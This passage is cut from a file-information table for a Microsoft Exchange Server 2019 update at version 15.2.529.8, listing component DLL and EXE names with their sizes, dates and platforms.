11:22| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.2.529.8| 30,080| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.compliance.common.dll| 15.2.529.8| 22,400| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.2.529.8| 85,880| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.compliance.dll| 15.2.529.8| 41,336| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.2.529.8| 37,248| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.2.529.8| 50,768| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.2.529.8| 33,144| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.2.529.8| 1,100,152| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.2.529.8| 206,712| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.2.529.8| 210,816| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.compression.dll| 15.2.529.8| 17,280| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.2.529.8| 37,760| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.2.529.8| 14,208| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.configuration.core.dll| 15.2.529.8| 145,792| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.2.529.8| 14,208| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.2.529.8| 53,112| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.2.529.8| 15,744| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.2.529.8| 23,632| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.2.529.8| 13,184| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.2.529.8| 54,648| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.2.529.8| 13,688| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.2.529.8| 1,845,840| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.2.529.8| 30,288| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.2.529.8| 68,688| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.2.529.8| 15,440| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.2.529.8| 21,376| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.2.529.8| 13,184| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.2.529.8| 25,976| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.connections.common.dll| 15.2.529.8| 169,856| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.connections.eas.dll| 15.2.529.8| 330,112| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.connections.imap.dll| 15.2.529.8| 174,152| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.connections.pop.dll| 15.2.529.8| 71,240| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.2.529.8| 203,640| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.context.client.dll| 15.2.529.8| 27,008| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.context.configuration.dll| 15.2.529.8| 51,576| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.context.core.dll| 15.2.529.8| 51,064| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.2.529.8| 46,976| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.core.strings.dll| 15.2.529.8| 1,093,496| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.core.timezone.dll| 15.2.529.8| 57,208| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.2.529.8| 326,736| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.2.529.8| 3,352,952| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.2.529.8| 35,920| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.2.529.8| 17,792| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.data.connectors.dll| 15.2.529.8| 165,240| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.2.529.8| 619,600| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.data.directory.dll| 15.2.529.8| 7,788,624| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.2.529.8| 80,488| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.data.dll| 15.2.529.8| 1,789,312| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.2.529.8| 1,626,488| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.data.ha.dll| 15.2.529.8| 375,168| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.2.529.8| 105,848| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.2.529.8| 15,952| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.2.529.8| 224,640| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.data.mapi.dll| 15.2.529.8| 186,752| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.2.529.8| 39,800| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.data.metering.dll| 15.2.529.8| 119,160| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.2.529.8| 968,288| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.data.notification.dll| 15.2.529.8| 141,384| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.2.529.8| 769,608| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.data.providers.dll| 15.2.529.8| 139,640| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.2.529.8| 56,696| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.2.529.8| 452,984| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.2.529.8| 32,640| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.2.529.8| 256,896| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.data.storage.dll| 15.2.529.8| 11,809,864| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.2.529.8| 37,760| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.2.529.8| 655,736| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.2.529.8| 175,488| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.2.529.8| 36,224| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.2.529.8| 14,200| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.2.529.8| 14,416| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.2.529.8| 14,928| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.2.529.8| 72,808| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.2.529.8| 13,392| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.2.529.8| 22,912| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.diagnostics.dll| 15.2.529.8| 2,212,736| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.2.529.8| 23,936| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.2.529.8| 546,680| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.2.529.8| 215,416| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.2.529.8| 194,640| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.2.529.8| 146,304| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.2.529.8| 27,520| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.2.529.8| 13,696| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.2.529.8| 49,528| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.2.529.8| 28,240| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.2.529.8| 208,768| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.2.529.8| 88,960| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.2.529.8| 32,632| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.2.529.8| 46,160| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.2.529.8| 19,024| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.dxstore.dll| 15.2.529.8| 473,680| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.2.529.8| 206,208| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.2.529.8| 36,936| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.2.529.8| 131,664| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.2.529.8| 21,888| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.2.529.8| 148,352| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.2.529.8| 220,024| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.2.529.8| 23,928| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.2.529.8| 97,896| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.2.529.8| 1,266,256| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.2.529.8| 1,266,256| 01-Jan-2020| 11:19| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 15,848| 01-Jan-2020| 11:19| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.2.529.8| 87,416| 01-Jan-2020| 11:22| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 66,576| 01-Jan-2020| 11:21| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.2.529.8| 52,088| 01-Jan-2020| 11:21| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.2.529.8| 292,216| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.2.529.8| 73,296| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.2.529.8| 45,952| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.booking.dll| 15.2.529.8| 218,496| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.2.529.8| 78,208| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.2.529.8| 35,704| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.2.529.8| 936,552| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.common.dll| 15.2.529.8| 336,256| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.2.529.8| 52,600| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.2.529.8| 32,128| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.context.dll| 15.2.529.8| 60,800| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.2.529.8| 853,880| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.2.529.8| 291,712| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.2.529.8| 39,288| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.2.529.8| 76,360| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.insights.dll| 15.2.529.8| 166,992| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.2.529.8| 1,486,720| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.2.529.8| 122,448| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.2.529.8| 12,327,288| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.2.529.8| 264,056| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.people.dll| 15.2.529.8| 37,752| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.2.529.8| 186,960| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.2.529.8| 64,592| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.2.529.8| 84,064| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.2.529.8| 63,872| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.2.529.8| 100,224| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.2.529.8| 144,768| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.2.529.8| 270,200| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.2.529.8| 15,224| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.2.529.8| 15,744| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.eserepl.dll| 15.2.529.8| 130,424| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.2.529.8| 254,336| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.2.529.8| 13,184| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.2.529.8| 37,240| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.2.529.8| 640,592| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.2.529.8| 37,240| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.2.529.8| 146,512| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.2.529.8| 13,184| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.2.529.8| 594,296| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.2.529.8| 14,712| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.2.529.8| 30,072| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.2.529.8| 99,704| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.2.529.8| 42,360| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.helpprovider.dll| 15.2.529.8| 40,320| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.2.529.8| 54,136| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.2.529.8| 164,224| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.2.529.8| 58,952| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.2.529.8| 204,160| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.2.529.8| 17,784| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.2.529.8| 30,800| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.2.529.8| 38,784| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.2.529.8| 48,504| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.2.529.8| 180,608| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.2.529.8| 36,736| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.httputilities.dll| 15.2.529.8| 25,976| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.2.529.8| 1,868,152| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.2.529.8| 54,864| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.2.529.8| 35,912| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.idserialization.dll| 15.2.529.8| 35,920| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.2.529.8| 18,296| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.2.529.8| 18,296| 01-Jan-2020| 11:21| Not applicable \nMicrosoft.exchange.imap4.exe| 15.2.529.8| 263,040| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.2.529.8| 263,040| 01-Jan-2020| 11:23| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.2.529.8| 25,160| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.2.529.8| 25,160| 01-Jan-2020| 11:21| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.2.529.8| 53,328| 01-Jan-2020| 11:19| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.2.529.8| 217,160| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.2.529.8| 32,128| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.2.529.8| 282,192| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.2.529.8| 19,016| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.2.529.8| 83,832| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.2.529.8| 15,232| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.2.529.8| 94,072| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.2.529.8| 1,840,000| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.2.529.8| 71,544| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.2.529.8| 175,488| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.2.529.8| 45,944| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.2.529.8| 159,608| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.2.529.8| 51,072| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.2.529.8| 46,160| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.2.529.8| 32,336| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.2.529.8| 100,224| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.2.529.8| 13,176| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.2.529.8| 271,440| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.killswitch.dll| 15.2.529.8| 22,392| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.2.529.8| 33,664| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.2.529.8| 18,296| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.2.529.8| 15,440| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.2.529.8| 27,520| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.2.529.8| 30,584| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.2.529.8| 22,392| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.2.529.8| 66,432| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.2.529.8| 29,568| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.2.529.8| 19,840| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.2.529.8| 20,344| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.2.529.8| 19,320| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.2.529.8| 34,176| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.2.529.8| 103,808| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.2.529.8| 31,616| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.2.529.8| 15,736| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.2.529.8| 20,856| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.2.529.8| 16,248| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.2.529.8| 49,016| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.2.529.8| 44,408| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.2.529.8| 38,264| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.2.529.8| 10,375,248| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.2.529.8| 29,048| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.2.529.8| 21,584| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.2.529.8| 24,440| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.2.529.8| 15,224| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.2.529.8| 21,880| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.2.529.8| 89,472| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.2.529.8| 20,856| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.2.529.8| 26,488| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.2.529.8| 21,584| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.2.529.8| 28,024| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.2.529.8| 28,536| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.2.529.8| 36,216| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.2.529.8| 17,000| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.2.529.8| 19,832| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.2.529.8| 15,224| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.2.529.8| 17,488| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.2.529.8| 20,048| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.2.529.8| 57,208| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.2.529.8| 17,992| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.2.529.8| 18,808| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.2.529.8| 16,256| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.2.529.8| 17,792| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.2.529.8| 15,440| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.2.529.8| 15,440| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.2.529.8| 52,816| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.2.529.8| 18,296| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.2.529.8| 34,168| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.2.529.8| 17,280| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.2.529.8| 19,016| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.2.529.8| 43,384| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.loguploader.dll| 15.2.529.8| 165,448| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.2.529.8| 54,864| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.2.529.8| 9,055,608| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.2.529.8| 33,144| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.2.529.8| 124,288| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.2.529.8| 82,808| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.2.529.8| 14,416| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.2.529.8| 30,072| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.2.529.8| 661,376| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.2.529.8| 63,360| 01-Jan-2020| 11:22| x86 